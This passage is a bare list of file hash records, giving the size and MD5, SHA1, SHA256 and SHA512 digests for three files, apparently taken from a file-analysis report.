SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.6MB
MD5d7239bc304b1d9d4ae192e2570419d53
SHA1dccb1c1c8021d791852cd5c0dc5c6240be0ed2d1
SHA2567543e6925701f6fde75accb15f483991596b55260b720ba7dbc84cc48eeb27aa
SHA512d52dde51b91d287c750e85828ce4dd7a46e0ea2235fd6e63d4e7588745f7e34c198827cccb2d719525ecea5e92a8804377ca193b2d3e1e0e986d4f77d8dd4430
-
Filesize
66KB
MD5cfa65b13918526579371c138108a7ddb
SHA128bc560c542c405e08001f95c4ea0511e5211035
SHA2564c70fea1c4f9b78955eb840c11c6c81f1d860485e090526a8e8176d98b1be3d6
SHA5127ad417e862c38f1032b300735c00050435f0dd1d816e93b9a466adf3bc092be770ebf59c1617db2281c7cf982a75e6c93d927d5784132aa2c6292f3e950eca88
-
Filesize
93KB
MD5dc73eb0945a5e0246479de101537c9d8
SHA1b4a9d97c2c6a43944a92bc6356e9be2582918da7
SHA256a1f6562dab180a4c2967eab04cf6f39e3f19c99068824230b7c32891da8aba73
SHA5120bf6c18bc1bf62b3025128a419091ca3a0239bcfb519007549dfa350584890ccce30115cb9c3f72e647c3d4c142cec09bba8842e6666513f3358f2557fe96f29